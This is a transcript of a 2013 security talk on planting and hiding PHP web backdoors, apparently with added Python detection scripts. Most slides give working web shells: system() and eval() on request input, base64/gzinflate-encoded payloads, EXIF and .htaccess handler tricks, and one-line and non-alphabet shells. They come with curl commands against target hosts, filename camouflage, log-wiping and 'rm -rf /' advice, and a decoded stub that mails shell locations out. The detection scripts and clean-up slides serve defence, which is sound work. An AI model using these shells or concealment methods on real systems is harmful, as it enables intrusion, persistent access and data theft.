Art of Web Backdoor - Pichaya Morimoto
DESCRIPTION
Topic: Art of Web Backdoor
Speaker: Pichaya Morimoto
Event: 2600 Thailand Meeting #5
Date: September 6, 2013
Video: https://www.youtube.com/watch?v=QIXTPPBfLyI
TRANSCRIPT
[Page 1]
Art of Web Backdoor
stealth ways to hide your ass in pwned box
Pichaya Morimoto
[email protected]/index.html
linkedin.com/in/pich4ya
[Page 2]
Legal Warning
Computer-Related Crime Act B.E. 2550 (2007)
Section 5: Whoever unlawfully accesses a computer system that has a specific access-control measure, where that measure is not intended for their use, is liable to imprisonment of up to 6 months or a fine of up to 10,000 baht.
Section 7: Whoever unlawfully accesses computer data that has a specific access-control measure, where that measure is not intended for their use, is liable to imprisonment of up to 2 years or a fine of up to 40,000 baht.
Section 9: Whoever unlawfully damages, destroys, corrects, alters or adds to, in whole or in part, the computer data of another person is liable to imprisonment of up to 5 years or a fine of up to 100,000 baht.
[Page 3]
Overview
★ Anatomy of (PHP) Web Hacking
★ Maintaining Access
★ Techniques
★ Covering Tracks
★ Case Studies
★ Detect / Clean up
[Page 4]
OWASP Top Ten 2013
A1 - Injection
A2 - Broken Authentication and Session Management
A3 - Cross-Site Scripting (XSS)
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10 - Unvalidated Redirects and Forwards
How do we plant a web backdoor?
High Risk
Medium Risk
Low Risk
[Page 5]
Public CMS/Plugins PWN
1. Vulnerability Assessment and Mapping
★ Vulnerable version? Vulnerability exists?
★ Conditions match? / Known limitations
2. Exploitation
★ Public exploit available?
2.1 Yes - Just use it
★ Review & test
2.2 No - Source code analysis
★ Patch file (.diff) / $ diff -ENwbur vul-src/ patched-src/
★ Issue tracker (SVN/GIT repo.)
★ Public / private vulnerability discussion
3. Zero-Day - for l33t h4x0r!
★ Source code analysis without patch, valuable!
[Page 6]
Bypassing File Upload Restrictions in Joomla!
Joomla! - Unauthorised Uploads
Affected Versions: 2.5.x <= 2.5.13 and 3.x <= 3.1.4
Fixed Date: 2013-July-31 (2.5.14, 3.1.5)
Vulnerable files
1. libraries/joomla/filesystem/file.php
2. administrator/components/com_media/helpers/media.php
Scenario
1. Joomla! <= 2.5.13
2. User with author privilege
3. OS = Windows machine, or misconfigured Apache + Linux
[Page 7]
Known Issues or Limitations
[Page 8]
Backdoor is a Feature for Admin!
[Page 9]
Also in IPB, SMF, vBulletin
[Page 10]
Latest vBulletin 5.0.4 - PHP Module
[Page 11]
Case Study - Official Ubuntu Forums
http://www.ubuntuforums.org/
★ Hacked on 14 July 2013, defaced on 20 July 2013
★ 1.82 million users' data leaked
★ Attacker had full access on the Forums app servers
★ Servers running latest version of vBulletin
What happened (posted in Canonical Blog)
● A moderator account was hacked
● Attacker posted XSS to the forum and sent it to an admin
● 31 seconds later .. admin account was PWNED
[Page 12]
IPB - Bad Sanitization
Invision Power Board <= 3.4.4
Released on: 2013/05/13 by @johnjean
Logical Vulnerability + Bad Sanitization
1. Create a new user using [email protected]+[150 spaces]+A
2. MySQL limitation! Strings exceeding 150 characters are truncated and the value is trimmed, so an arbitrary user ends up with the same email as admin and can change the admin password!
[Page 13]
Other factors
3rd party components
★ uploadify, ckeditor, ckfinder, tinymce, openx
Shared Hosting Security
★ Exposed session data
★ Improper user privileges (OS/code execution, critical file manipulation)
★ Vulnerable services (SSH, FTP etc.)
MITM, insider attack, lack of physical access control etc.
[Page 14]
Maintaining Access
Add arbitrary accounts (*nix shadow, AD etc.)
Reverse Shell and/or Bind Shell using ...
★ Binary/Script Backdoor
1. Bind port to *nix shell
2. Send *nix shell back to attacker
3. Make a relay tunnel
4. Hidden trigger to spawn shell
★ Web Backdoor - Use less privileged!
Connect via HTTP methods & headers (GET/POST etc.)
[Page 15]
Simple PHP Backdoor
<?php
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die();
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
$ curl -d "cmd=cat+/etc/passwd" http://target.com/simple-backdoor.php
[Page 16]
Hide your ASS
[Page 17]
Communication
Passing variables to PHP global vars:
$_GET
$_POST
$_COOKIE
$_REQUEST
$_SERVER['HTTP_CMD']
$ curl -A- -vvv 127.0.0.1/test1.php -H "Accept_Encoding: @system('uname -a;ps -aux');"
[Page 18]
base64_decode() + gzinflate()
1. Encode (Attacker Client)
$ php -r "echo base64_encode(gzdeflate('system(\"id\")'));"
K64sLknN1VDKTFHSBAA=
2. Send (Attacker Client)
$ curl -A- -vvv 127.0.0.1/test3.php -d "cmd=K64sLknN1VDKTFHSBAA="
3. Decode (PHP Backdoor)
@eval(gzinflate(base64_decode($_POST["cmd"])));
4. Output
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[Page 19]
Code Evaluation besides eval()
1. assert()
assert('sys' . 'tem('.$_POST["cmd"].')');
$ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'"
2. preg_replace() with the /e modifier (deprecated in PHP 5.5.0)
preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '');
$ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp"
3. And many more, e.g. OS command execution functions; check out this link:
http://stackoverflow.com/questions/3115559/exploitable-php-functions
[Page 20]
★ GNU license at the beginning of a PHP file!
/* Copyright (C) 1991 Free Software Foundation, Inc.
This file is part of the GNU C Library.
… */ <?php ...
★ PGP Public Key !?
/* -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
... */ <?php …
★ Software license that PROHIBITS decoding
Stupid trick! but it works!
★ More creative filenames!
○ lndex.php
○ 1ndex.php
○ index2.php
○ wp-manual.php
○ cat.jpg.php
○ license.txt
○ README.md
○ .bash_profile
[Page 21]
PHP: exif_read_data()
1. Create EXIF meta-data using exiftool
$ exiftool 2600.jpg -Software=system
$ exiftool 2600.jpg -Model=id
2. Put 2600.jpg along with the backdoor
$A = exif_read_data('2600.jpg');
$A['Software']($A['Model']);
3. Browse to the backdoor and boom!
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[Page 22]
.htaccess + any file format
1. Apache Configuration
AllowOverride All
2. .htaccess
<FilesMatch "2600.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
3. 2600.jpg
<?php @system($_POST["cmd"]); ?>
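A defender-side check for this trick, added here as an example (it is not the speaker's code): it audits .htaccess text for directives that make Apache execute non-PHP files as PHP, and audits httpd.conf for the AllowOverride setting that lets such an .htaccess take effect at all. All config fragments below are constructed; the first .htaccess is the slide's own. The handler-name list and the set of php.ini keys treated as risky are this example's assumptions.

```python
"""Audit .htaccess files and the Apache AllowOverride setting for the handler-remap
trick on this slide (added example; not the speaker's code; config text is constructed)."""
import re

# Handler/MIME names that make Apache execute a file as code regardless of its extension.
CODE_HANDLERS = ("x-httpd-php", "php-script", "php-fpm", "php-cgi", "cgi-script", "fcgid-script")
PHP_EXTS = (".php", ".phtml", ".php5", ".php7", ".phps")
# php.ini keys an .htaccess may override to inject code or blunt hardening (assumed list).
RISKY_INI_KEYS = ("auto_prepend_file", "auto_append_file", "engine", "disable_functions", "open_basedir")

FILES_OPEN = re.compile(r'<(?:Files|FilesMatch)\s+"?([^">]+?)"?\s*>', re.I)
FILES_CLOSE = re.compile(r"</(?:Files|FilesMatch)\s*>", re.I)
DIR_OPEN = re.compile(r'<Directory\s+"?([^">]+?)"?\s*>', re.I)
DIR_CLOSE = re.compile(r"</Directory\s*>", re.I)


def scan_htaccess(text):
    """Return (rule, line_no, files_context, directive) tuples; files_context is None outside <Files*> blocks."""
    findings = []
    context = None
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = FILES_OPEN.match(line)
        if m:
            context = m.group(1)
            continue
        if FILES_CLOSE.match(line):
            context = None
            continue
        tokens = line.split()
        directive, args = tokens[0].lower(), [t.lower() for t in tokens[1:]]
        if directive == "sethandler" and args and any(h in args[0] for h in CODE_HANDLERS):
            # Only benign when the enclosing block clearly targets PHP files themselves.
            if context is None or "php" not in context.lower():
                findings.append(("handler-remap", lineno, context, line))
        elif directive in ("addhandler", "addtype") and len(args) >= 2 and any(h in args[0] for h in CODE_HANDLERS):
            # Extensions other than the PHP ones being mapped to the PHP handler.
            odd = [e for e in args[1:] if (e if e.startswith(".") else "." + e) not in PHP_EXTS]
            if odd:
                findings.append(("handler-remap", lineno, context, line))
        elif directive in ("php_value", "php_flag", "php_admin_value", "php_admin_flag") and args and args[0] in RISKY_INI_KEYS:
            findings.append(("php-ini-override", lineno, context, line))
        elif directive == "options" and any(a.lstrip("+") == "execcgi" for a in args):
            findings.append(("execcgi-enabled", lineno, context, line))
    return findings


def audit_allowoverride(conf):
    """Return (line_no, directory, value) for every AllowOverride other than None.
    SetHandler/AddHandler/AddType belong to the FileInfo override class, so AllowOverride
    FileInfo is already enough for the slide's .htaccess to work; None is what blocks it."""
    findings = []
    directory = None
    for lineno, raw in enumerate(conf.splitlines(), 1):
        line = raw.strip()
        m = DIR_OPEN.match(line)
        if m:
            directory = m.group(1)
        elif DIR_CLOSE.match(line):
            directory = None
        elif line.lower().startswith("allowoverride "):
            value = line.split(None, 1)[1].strip()
            if value.lower() != "none":
                findings.append((lineno, directory, value))
    return findings


# Constructed samples: the slide's .htaccess, a typical benign one, two other remap styles, and a vhost fragment.
HTACCESS_FROM_SLIDE = """<FilesMatch "2600.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
"""
HTACCESS_BENIGN = """# typical CMS rewrite rules plus the normal PHP mapping
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^index\\.php$ - [L]
</IfModule>
<FilesMatch "\\.php$">
SetHandler application/x-httpd-php
</FilesMatch>
AddHandler application/x-httpd-php .php .phtml
"""
HTACCESS_OTHER_TRICKS = """AddType application/x-httpd-php .jpg .txt
php_value auto_prepend_file /path/to/prepended.php
Options +ExecCGI
"""
HTTPD_CONF = """<Directory "/var/www/html">
    AllowOverride All
</Directory>
<Directory "/var/www/static">
    AllowOverride None
</Directory>
"""

if __name__ == "__main__":
    for label, text in [("slide", HTACCESS_FROM_SLIDE), ("benign", HTACCESS_BENIGN), ("other", HTACCESS_OTHER_TRICKS)]:
        print(label, scan_htaccess(text))
    print("AllowOverride not None:", audit_allowoverride(HTTPD_CONF))
```

Run over a real tree, the same functions apply to every .htaccess found under the document root; the AllowOverride audit is the preventive half, since with AllowOverride None Apache never reads those files.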
[Page 23]
one statement PHP backdoor
<?@$_POST[0]($_POST[1])?>
$ curl -A- "http://target/backdoor.php" -d "0=system&1=uname+-a"
[Page 24]
Binary Code in PHP Shell
[Page 25]
Binary Code in PHP Shell
[Page 26]
non-alphabet PHP shell
<?$_="";$_[+""]='';$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>
$ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a"
*** This code contains non-printable characters, it might not work if you copy & paste! ***
[Page 27]
Common survivor features!
works on various types of OS (win/linux/osx) and ISO ??
find writable directory
read/write file
merge into every file
merge into backup db / files / zip
reverse/bind php shell
database client
file management (symlink?)
av/ids/ips/waf detection
credential dumper
os command
network scanner
TCP/UDP/HTTP/DNS amp flood
SOCKS proxy for pivoting
HTTP proxy, IRC connect back
etc.
[Page 28]
Exploit Pack
[Page 29]
Free Kiddies Backdoor!
c99
r57
wso
icfdkshell
weevely
ASPsh
msfpayload
use at your own risk!
Caution! There are many cases where a backdoor is served inside another backdoor *w*)a
e.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1.zip
$x10="\x6dai\154";$x0b=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];$x0c="\141r\162a\171\040".$x0b;$x0d=array("\143\x61","\x6c\x69","\146\x77\162\151\x74\x65","\100","v\x65\x2e");$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
Decoded:
mail("[email protected]","target/backdoor.php","target/backdoor.php");
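As an added example for the hunting side of this and the preceding slides (it is not the speaker's code), a small Python triage scanner that flags the idioms shown in the deck: request superglobals reaching eval()/assert()/system() and friends, decode-then-execute chains, the preg_replace() /e modifier, array elements and computed variable names called as functions (the exif_read_data(), one-statement and non-alphabet shells), the escaped-string style of the wso stub above, and the 'FilesMan' marker that the iptables rule later in the deck also matches. The PHP samples are copied from the slides; the rule names, the light variable-taint pass and the escape-density threshold are this example's own choices.

```python
"""Regex triage for the PHP backdoor idioms shown in this deck (added example; not the
speaker's code). Rule names and the escape-density threshold are this example's own."""
import re

# Taint sources: request superglobals, including request headers via $_SERVER['HTTP_*'].
SUPERGLOBAL = r"\$_(?:GET|POST|COOKIE|REQUEST|SERVER|FILES)\b"
# Code- and command-execution sinks.
SINKS = r"(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open|create_function)"
# Decoders used to keep the payload out of a plain grep.
DECODERS = r"(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev|hex2bin|convert_uudecode)"

RULES = [
    # eval(...$_POST...), system(...$_REQUEST...); also assert('sys'.'tem('.$_POST[...]) which grep "system(" misses
    ("superglobal-into-sink", re.compile(r"\b" + SINKS + r"\s*\([^;]*" + SUPERGLOBAL, re.I)),
    # eval(gzinflate(base64_decode(...))) and similar decode-then-execute chains
    ("decode-into-sink", re.compile(r"\b" + SINKS + r"\s*\(\s*@?" + DECODERS + r"\s*\(", re.I)),
    # preg_replace('/.../e', ...): the /e modifier evaluates the replacement as PHP code
    ("preg_replace-e-modifier", re.compile(r"""preg_replace\s*\(\s*(['"])(\W).*?\2[a-zA-Z]*e[a-zA-Z]*\1""")),
    # $_POST[0]($_POST[1]) and $A['Software']($A['Model']): an array element used as the function name
    ("array-element-called-as-function", re.compile(r"\$\w+\s*\[[^\]]*\]\s*\(")),
    # ${'_'.$_}['_'](...): a computed variable name used as the function name
    ("dynamic-variable-called-as-function", re.compile(r"\$\{[^}]*\}\s*(?:\[[^\]]*\]\s*)*\(")),
    # exif_read_data() is harmless alone; paired with the array-element rule it is the EXIF-payload pattern
    ("exif-metadata-read", re.compile(r"\bexif_read_data\s*\(", re.I)),
    # request marker of the wso shell (the iptables rule later in the deck matches the same string)
    ("known-shell-marker", re.compile(r"FilesMan")),
]
# "\x6dai\154" spells "mail": many hex/octal escapes on one line hide function names from grep.
ESCAPED_BYTE = re.compile(r"\\x[0-9a-fA-F]{2}|\\[0-7]{3}")
ESCAPE_THRESHOLD = 8


def tainted_variables(source):
    """Names of plain variables assigned from a superglobal anywhere in the file, e.g. $cmd = $_REQUEST['cmd']."""
    return set(re.findall(r"\$(\w+)\s*=[^=;]*" + SUPERGLOBAL, source))


def scan(source):
    """Return [(rule, line_no), ...] in line order for one PHP source text."""
    findings = []
    tainted = tainted_variables(source)
    tainted_sink = None
    if tainted:
        names = "|".join(re.escape(n) for n in sorted(tainted))
        tainted_sink = re.compile(r"\b" + SINKS + r"\s*\([^;]*\$(?:" + names + r")\b", re.I)
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((name, lineno))
        if tainted_sink and tainted_sink.search(line):
            findings.append(("tainted-variable-into-sink", lineno))
        if len(ESCAPED_BYTE.findall(line)) >= ESCAPE_THRESHOLD:
            findings.append(("dense-escaped-string", lineno))
    return findings


# Samples copied from the slides (the wso stub is the first part of the slide's line) plus one benign file.
SAMPLE_SIMPLE = r'''<?php
if (isset($_REQUEST['cmd'])) {
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>'''
SAMPLE_ENCODED = r'''<?php @eval(gzinflate(base64_decode($_POST["cmd"]))); ?>'''
SAMPLE_ASSERT = r'''<?php assert('sys' . 'tem('.$_POST["cmd"].')'); ?>'''
SAMPLE_PREG = r'''<?php preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), ''); ?>'''
SAMPLE_EXIF = r'''<?php
$A = exif_read_data('2600.jpg');
$A['Software']($A['Model']);
?>'''
SAMPLE_ONELINER = r'''<?@$_POST[0]($_POST[1])?>'''
SAMPLE_NONALPHA = r'''<?=${'_'.$_}['_'](${'_'.$_}['__']);?>'''
SAMPLE_WSO_STUB = r'''<?php $x10="\x6dai\154";$x0b=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];$x0c="\141r\162a\171\040".$x0b; ?>'''
SAMPLE_BENIGN = r'''<?php
$name = htmlspecialchars($_GET['name'] ?? 'guest');
echo "Hello, $name";
?>'''

if __name__ == "__main__":
    for label, src in [("simple", SAMPLE_SIMPLE), ("encoded", SAMPLE_ENCODED), ("assert", SAMPLE_ASSERT),
                       ("preg", SAMPLE_PREG), ("exif", SAMPLE_EXIF), ("oneliner", SAMPLE_ONELINER),
                       ("nonalpha", SAMPLE_NONALPHA), ("wso-stub", SAMPLE_WSO_STUB), ("benign", SAMPLE_BENIGN)]:
        print(label, scan(src))
```

This is a triage pass, not a parser: framework code that legitimately calls variable functions will also trip the array-element rule, so treat hits as a review queue and weigh them by how many rules fire on the same file.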
[Page 30]
Covering Tracks
★ root?
★ logs e.g. /var/log/*
★ history e.g. ~/.bash_history
★ self-destruction
★ rm -rf /
[Page 31]
Detect / Prevent
★ Follow secure coding guidelines
★ Security hardening checklists
★ Critical File Integrity Monitoring
★ VA / Pentest by certified guys
★ Patch Management & Patch Auditing
★ Centralized Log & WAF?
$ iptables -A OUTPUT -m string --algo bm --string 'FilesMan' -j DROP
[Page 32]
MOD_Security ?
var_dump(in_array('mod_security2', apache_get_modules()));
print_r(apache_get_modules());
[Page 33]
Clean up
1. Change/reset passwords
2. Review log files
3. Hunting vulnerable apps/backdoors
4. Backup || Recovery
$ grep - common danger functions
$ find
★ newly created files
★ certain conditions (time/date/permission)
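For the find step on this slide, an added Python example (not the speaker's tooling) that walks a webroot and reports the conditions the deck lists: files modified after the last known-good deploy, PHP files in upload or image directories, world-writable PHP, double extensions like cat.jpg.php, look-alike names such as lndex.php and 1ndex.php, dotfiles, symlinks, and PHP open tags inside files that are not supposed to be code (license.txt, 2600.jpg). build_demo_tree() creates a constructed throw-away webroot with placeholder file bodies so the hunt runs offline; the directory names treated as data-only, the canonical filenames, and the baseline timestamp are assumptions.

```python
"""Filesystem hunt for the "Clean up" step (added example; not the speaker's code).
build_demo_tree() builds a constructed webroot whose file bodies are placeholders."""
import os
import re
import shutil
import stat
import tempfile
import time

PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)")
PHP_EXTS = (".php", ".phtml", ".php5", ".phar")
DATA_ONLY_DIRS = ("uploads", "images", "media", "cache", "tmp")   # assumed: no code belongs here
DECOY_EXTS = ("jpg", "jpeg", "png", "gif", "txt", "pdf", "zip")   # inner extension of cat.jpg.php
CANONICAL = ("index.php", "wp-config.php", "config.php")          # assumed names worth imitating
LOOKALIKES = str.maketrans("l1I0O", "iiioo")                      # lndex.php / 1ndex.php -> index.php


def canonical_name(name):
    return name.lower().translate(LOOKALIKES)


def hunt(root, since):
    """Return sorted (reason, relative_path) pairs; `since` is the epoch time of the last known-good deploy."""
    findings = set()
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            rel = os.path.relpath(path, root)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                findings.add(("symlink-in-webroot", rel))
                continue
            ext = os.path.splitext(fname)[1].lower()
            is_php = ext in PHP_EXTS
            if st.st_mtime > since:
                findings.add(("modified-since-baseline", rel))
            if fname.startswith("."):
                findings.add(("dotfile-in-webroot", rel))
            if is_php and rel.split(os.sep)[0] in DATA_ONLY_DIRS:
                findings.add(("php-in-data-dir", rel))
            if is_php and st.st_mode & stat.S_IWOTH:
                findings.add(("world-writable-php", rel))
            parts = fname.lower().split(".")
            if is_php and len(parts) >= 3 and parts[-2] in DECOY_EXTS:
                findings.add(("double-extension", rel))
            if fname.lower() not in CANONICAL and canonical_name(fname) in CANONICAL:
                findings.add(("lookalike-filename", rel))
            if not is_php:
                # Only the first 4 KB: a PHP open tag in a .txt/.md/.jpg is what the .htaccess trick needs.
                with open(path, "rb") as fh:
                    if PHP_OPEN_TAG.search(fh.read(4096)):
                        findings.add(("php-code-in-non-php-file", rel))
    return sorted(findings)


def build_demo_tree():
    """Constructed sample webroot reproducing the filenames from the slides; bodies are placeholders."""
    root = tempfile.mkdtemp(prefix="webroot-demo-")
    deployed = time.time() - 30 * 86400              # pretend the site went live a month ago
    placeholder_php = b"<?php /* constructed placeholder */ ?>"
    old_files = {
        "index.php": placeholder_php,
        "README.md": b"# docs\n",
        "license.txt": b"/* Copyright (C) 1991 ... */ " + placeholder_php,   # license-comment camouflage
        ".bash_profile": b"export PATH=$PATH:/usr/local/bin\n",
        "lndex.php": placeholder_php,                                        # 'l' standing in for 'i'
        "images/logo.png": b"PNG placeholder",
        "images/2600.jpg": placeholder_php,                                  # code behind an image name
    }
    new_files = {"wp-manual.php": placeholder_php, "uploads/cat.jpg.php": placeholder_php}
    for rel, body in {**old_files, **new_files}.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
        os.chmod(path, 0o644)
        if rel in old_files:
            os.utime(path, (deployed, deployed))
    os.chmod(os.path.join(root, "uploads", "cat.jpg.php"), 0o666)
    os.symlink("../../outside-webroot", os.path.join(root, "uploads", "escape"))
    return root, deployed + 3600


if __name__ == "__main__":
    root, since = build_demo_tree()
    try:
        for reason, rel in hunt(root, since):
            print(f"{reason:28s} {rel}")
    finally:
        shutil.rmtree(root)
```

On a real incident the mtime baseline comes from the deployment record or a known-good backup, and the result list is the input to the grep step rather than a verdict: a file can be renamed or touched to defeat any single rule, which is why the conditions are combined.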
[Page 34]
Practical Hacking?
Capture The Flag
https://ctftime.org/
Online challenges
http://www.root-me.org/en/Challenges/
http://wargame2k10.nuitduhack.com/
http://captf.com/practice-ctf/
http://www.overthewire.org/wargames/natas/
http://www.modsecurity.org/demo/
VM Labs
http://blog.g0tmi1k.com/2011/03/vulnerable-by-design.html
https://pentesterlab.com/exercises/
http://vulnhub.com/
Thank You!